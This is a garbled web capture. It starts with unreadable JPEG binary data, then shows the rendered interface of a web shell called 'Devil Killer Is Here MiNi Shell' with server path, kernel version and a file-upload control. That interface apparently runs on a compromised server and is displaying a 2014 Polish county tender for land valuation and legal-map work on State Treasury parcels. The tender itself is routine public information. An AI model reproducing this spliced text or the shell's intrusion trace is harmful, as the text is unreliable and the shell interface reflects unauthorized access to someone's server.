JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140903/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140903/188337-N-2014.html

<p class="kh_header"><b>Nowy Sącz: ZP.272.26.2014 Zamówienie na sporządzenie dokumentacji  związanej z  gospodarowaniem nieruchomościami stanowiącymi własność Skarbu Państwa</b><br>
<b>Numer ogłoszenia: 188337 - 2014; data zamieszczenia: 03.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Nowosądecki, Zarząd Powiatu Nowosądeckiego , ul. Jagiellońska 33, 33-300 Nowy Sącz, woj. małopolskie, tel. 18 4141600, faks 18 4141700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.starostwo.nowy-sacz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP.272.26.2014 Zamówienie na sporządzenie dokumentacji  związanej z  gospodarowaniem nieruchomościami stanowiącymi własność Skarbu Państwa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługi sporządzenia dokumentacji związanej z gospodarowaniem nieruchomościami stanowiącymi własność Skarbu Państwa:

sporządzenie operatu szacunkowego;
analiza stanu prawnego nieruchomości;
sporządzenie mapy do celów prawnych;
ustalenie przebiegu granic.

Cena za wykonanie usługi obejmuje również udział w postępowaniu administracyjnym                      i sądowym w sprawach dotyczących wykonanego opracowania, w tym w rozprawach przed urzędami oraz sądami powszechnymi. 


Postępowanie zostało podzielone na sześćdziesiąt cztery wyszczególnionych poniżej części. Wykonawca może złożyć ofertę na wszystkie części lub dowolnie przez siebie wybrane.
Część	Zakres prac
1	Sporządzenie operatu szacunkowego określającego wartość rynkową nieruchomości gruntowej oznaczonej jako działka ewid. nr 1551 o pow. 0,1897 ha położona w obrębie 0001 Muszyna, miasto Muszyna, objętej księga wieczystą nr NS1M/00026974/4 - dla potrzeb sprzedaży w trybie przetargu ustnego nieograniczonego.

2	Analiza stanu prawnego nieruchomości Skarbu Państwa dla celów realizacji ustawy z dnia 7 września 2007 r. o ujawnieniu w księgach wieczystych prawa własności nieruchomości Skarbu Państwa oraz jednostek samorządu terytorialnego dla działek ewidencyjnych nr: 74/4, 85/2, 100/2, 101/2, 101/3, 102/2, 103/2, 104/2, 105/2, 106/2, 107/2, 111/2, 112/2, 113/2, 114/2, 166/2, 620/3, 668/1, 674/2, 721/2, 722/2, 723/2, 835/2, 836/2, 875/2 o łącznej pow. 0,5938 ha położonych w gminie Rytro obręb Rytro. Przedmiotem analizy jest wykonanie wykazów zmian gruntowych oraz map do celów prawnych tj. kopii map z wykazem synchronizacyjnym, tabelarycznego wykazu powierzchni parcel gruntowych, badanie/odpis LWH wraz z podstawą wpisu własności, celem założenia księgi wieczystej dla w/w działek lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

3	Analiza stanu prawnego nieruchomości Skarbu Państwa dla księgi wieczystej NS1M/00002520/3 (143 parcel gruntowych/działek) o łącznej pow. 9,0361 ha położonych w gminie Muszyna obręb Leluchów. Przedmiotem analizy jest wykonanie wykazów zmian gruntowych oraz map do celów prawnych tj. kopii map z wykazem synchronizacyjnym oraz tabelaryczny wykaz powierzchni parcel gruntowych obj. w/w księgą wieczystą. 

4	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnej nr 591 o pow. 0,13 ha położonej w obrębie ewidencyjnym Żegiestów gmina Muszyna uwzględniającej zmianę oznaczeń z katastru austriackiego na poscaleniową mapę, a następnie  sporządzenie synchronizacji do nowej ewidencji wraz z ustaleniem podstawy nabycia wyżej w/w nieruchomości przez Skarb Państwa.

5	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych nr 111 o pow. 0,3748 ha, 404 o pow. 1,1487 ha i 735 o pow. 0,0756 ha położonych w obrębie 1 miasta Grybów wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

6	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działki ewidencyjnej nr 508 o pow. 0,06 ha położonej w obrębie ewidencyjnym Krużlowa Niżna gmina Grybów wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości.  

7	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działki ewidencyjnej nr 42 o pow. 1,8591 ha położonej w obrębie ewidencyjnym Stróże gmina Grybów wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

8	Analiza stanu prawnego nieruchomości Skarbu Państwa dla księgi wieczystej NS1G/00022184/5 (93 parcel gruntowych/działek) o łącznej pow. 126,7506 ha położonych w obrębie Florynka gmina Grybów. Przedmiotem analizy jest wykonanie wykazów zmian gruntowych oraz map do celów prawnych tj. kopii map z wykazem synchronizacyjnym oraz tabelaryczny wykaz powierzchni parcel gruntowych obj. w/w księgą wieczystą. 

9	Analiza stanu prawnego nieruchomości Skarbu Państwa dla księgi wieczystej NS1S/00007163/2 (37 parcel gruntowych/działek) o łącznej pow. 75,5189 ha położonych w obrębie Królowa Górna gmina Kamionka Wielka. Przedmiotem analizy jest wykonanie wykazów zmian gruntowych oraz map do celów prawnych tj. kopii map z wykazem synchronizacyjnym oraz tabelaryczny wykaz powierzchni parcel gruntowych obj. w/w księgą wieczystą. 

10	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych nr 216/3 o pow. 0,05 ha, 216/4 o pow. 0,02 ha, 223/2 o pow. 0,23 ha, 310 o pow. 0,07 ha, 312 o pow. 0,03 ha i 313 o pow. 0,01 ha położonych w obrębie ewidencyjnym Bukowiec gmina Korzenna wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości.  

11	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych nr 438/1 o pow. 1,10 ha i 439 o pow. 0,14 ha  położonych w obrębie ewidencyjnym Lipnica Wielka gmina Korzenna wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

12	Analiza stanu prawnego nieruchomości Skarbu Państwa dla księgi wieczystej NS1M/00005433/7 (108 parcel gruntowych/działek) o łącznej pow. 583,9610 ha położonych w obrębie Tylicz gmina Krynica-Zdrój. Przedmiotem analizy jest wykonanie wykazów zmian gruntowych oraz map do celów prawnych tj. kopii map z wykazem synchronizacyjnym oraz tabelaryczny wykaz powierzchni parcel gruntowych obj. w/w księgą wieczystą. 

13	Analiza stanu prawnego nieruchomości Skarbu Państwa dla księgi wieczystej NS1M/00005432/0  (90 parcel gruntowych/działek) o łącznej pow. 31,9145 ha położonych w obrębie Muszynka gmina Krynica-Zdrój. Przedmiotem analizy jest wykonanie wykazów zmian gruntowych oraz map do celów prawnych tj. kopii map z wykazem synchronizacyjnym oraz tabelaryczny wykaz powierzchni parcel gruntowych obj. w/w księgą wieczystą. 

14	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla prg 395/3 o pow. 0,0176 ha obj. Księgą wieczystą NS1S/00023532/8 położoną w obrębie ewidencyjnym Nowa Wieś gmina Łabowa do zmiany oznaczenia nieruchomości. 

15	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działki ewidencyjnej nr 48/1 o pow. 0,35 ha położonej w obrębie ewidencyjnym Krzyżówka gmina Łabowa wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

16	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych nr 353 o pow. 0,07 ha, 361 o pow. 0,06 ha i 366 o pow. 0,13 ha położonych w obrębie ewidencyjnym Łabowa gmina Łabowa wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

17	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działki ewidencyjnej nr 34 o pow. 0,52 ha położonej w obrębie ewidencyjnym Klęczany gmina Chełmiec wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

18	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działki ewidencyjnej nr 204 o pow. 0,07 ha położonej w obrębie ewidencyjnym Biczyce Dolne gmina Chełmiec wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości.

19	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych nr 111, 404, 735 o łącznej pow. 1,5991 ha położonych w obrębie 1 miasta Grybów wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

20	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działki ewidencyjnej nr 42 o pow. 1,8591 ha położonej w obrębie ewidencyjnym Stróże gmina Grybów wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

21	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych nr 862/2, 862/3, 867/1, 2205/2, 2209/2, 2212/2, 2213/2, 2325/2, 2325/3, 2325/4, 2370/2, 2371/2, 2374/2, 2375/2, 2376/2, 2376/3, 2377/2, 2378/2, 2380/2 o łącznej pow. 1,61 ha położonych w obrębie ewidencyjnym Biała Niżna gmina Grybów wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

22	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych nr 98, 101, 175, 199, 463, 466, 470, 487, 528, 549, 604, 703, 733, 831, 870, 1194, 1338, 1339, 1340, 1344, 1394, 1894, 2324, 2550 o łącznej pow. 9,76 ha położonych w obrębie ewidencyjnym Biała Niżna gmina Grybów wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

23	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych pod nr jednostki rejestrowej 11 (148 działek) o łącznej pow. 7,3127 ha położonych w obrębie ewidencyjnym Gródek gmina Grybów wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

24	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych nr 155, 478, 481, 538, 579, 638 o łącznej pow. 6,59 ha położonych w obrębie ewidencyjnym Krużlowa Niżna gmina Grybów wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

25	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych nr 74, 106, 113, 255, 272, 293, 478, 546 o łącznej pow. 6,10 ha położonych w obrębie ewidencyjnym Krużlowa Wyżna gmina Grybów wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

26	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych nr 156, 244, 246, 261, 274, 449, 504, 518 o łącznej pow. 2,4144 ha położonych w obrębie ewidencyjnym Polna gmina Grybów wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

27	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych nr 222, 246, 341, 423, 456, 531, 691 o łącznej pow. 2,95 ha położonych w obrębie ewidencyjnym Ptaszkowa gmina Grybów wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

28	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych nr 286, 370/1, 450, 560, 755, 847, 874 o łącznej pow. 8,72 ha położonych w obrębie ewidencyjnym Korzenna gmina Korzenna wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

29	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych nr 1, 14, 24, 203, 315 o łącznej pow. 1,91 ha położonych w obrębie ewidencyjnym Bukowiec gmina Korzenna wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

30	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działki ewidencyjnej nr 287 o pow. 0,68 ha położonej w obrębie ewidencyjnym Janczowa gmina Korzenna wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

31	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych nr 191 o pow. 0,22 ha, 235 o pow. 0,52 ha i 683 o pow. 0,41 ha położonych w obrębie ewidencyjnym Jasienna gmina Korzenna wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

32	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych nr 253, 437, 658, 1041, 1042, 1046, 1048, 1068, 1072, 1075 o łącznej pow. 9,45 ha położonych w obrębie ewidencyjnym Lipnica Wielka gmina Korzenna wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

33	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych nr 150 o pow. 0,74 ha i 86 o pow. 0,06 ha położonych w obrębie ewidencyjnym Łęka Siedlecka gmina Korzenna wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

34	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych nr 18/2, 172, 192, 244, 304 o łącznej pow. 2,59 ha położonych w obrębie ewidencyjnym Łyczana gmina Korzenna wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

35	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych nr 40 o pow. 0,40 ha i 65 o pow. 0,24 ha położonych w obrębie ewidencyjnym Mogilno gmina Korzenna wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

36	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych nr 139 o pow. 0,87 ha i 162 o pow. 0,50 ha położonych w obrębie ewidencyjnym Niecew gmina Korzenna wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

37	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych nr 144 o pow. 0,42 ha, 235 o pow. 0,68 ha i 329 o pow. 0,20 ha położonych w obrębie ewidencyjnym Posadowa Mogilska gmina Korzenna wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

38	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działki ewidencyjnej nr 256 o pow. 1,07 ha położonej w obrębie ewidencyjnym Trzycierz gmina Korzenna wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

39	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych nr 84, 205, 215, 256, 476 o łącznej pow. 15,25 ha położonych w obrębie ewidencyjnym Wojnarowa gmina Korzenna wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

40	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych nr 94 o pow. 0,04 ha i 255/2 pow. 0,01 ha położonych w obrębie ewidencyjnym Maciejowa gmina Łabowa wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

41	Analiza stanu prawnego nieruchomości Skarbu Państwa dla księgi wieczystej NS1S/00002202/3 (123 parcel gruntowych/działek) o łącznej pow. 27,6204 ha położonych w obrębie ewidencyjnym Łabowa gmina Łabowa. Przedmiotem analizy jest wykonanie wykazów zmian gruntowych oraz map do celów prawnych tj. kopii map z wykazem synchronizacyjnym oraz tabelaryczny wykaz powierzchni parcel gruntowych obj. w/w księgą wieczystą. 

42	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych nr 353 o pow. 0,07 ha, 361 o pow. 0,06 ha i 366 pow. 0,13 ha położonych w obrębie ewidencyjnym Łabowa gmina Łabowa wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

43	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działki ewidencyjnej nr 4 o pow. 0,22 ha położonej w obrębie ewidencyjnym Łącko gmina Łącko wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

44	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych nr 643 i 651 o łącznej pow. 0,06 ha położonej w obrębie ewidencyjnym Zagorzyn gmina Łącko wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

45	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych pod nr jednostki rejestrowej 25 (34 działki) o łącznej pow. 28,27 ha położonych w obrębie ewidencyjnym Żegiestów gmina Muszyna wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

46	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych nr 237, 289, 290, 291 o łącznej pow. 0,43 ha położonej w obrębie ewidencyjnym Nawojowa gmina Nawojowa wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

47	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych pod nr jednostki rejestrowej 601 (19 działek) o łącznej pow. 10,0450 ha położonych w obrębie ewidencyjnym Frycowa gmina Nawojowa wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

48	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych pod nr jednostki rejestrowej 6 (54 działki) o łącznej pow. 4,6249 ha położonych w obrębie ewidencyjnym Frycowa gmina Nawojowa wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

49	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych nr 88, 91/1, 91/2, 91/3 o łącznej pow. 1,70 ha położonych w obrębie ewidencyjnym Rogi gmina Podegrodzie wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

50	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych nr 14, 52, 53, 106 o łącznej pow. 0,28 ha położonych w obrębie ewidencyjnym Brzezna gmina Podegrodzie wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

51	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych nr 1, 434, 591, 373/1, 373/2 o łącznej pow. 3,4451 ha położonych w obrębie ewidencyjnym Długołęka-Świerkla gmina Podegrodzie wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

52	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych nr 223, 865, 1010/2, 584 o łącznej pow. 0,94 ha położonych w obrębie ewidencyjnym Gostwica gmina Podegrodzie wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

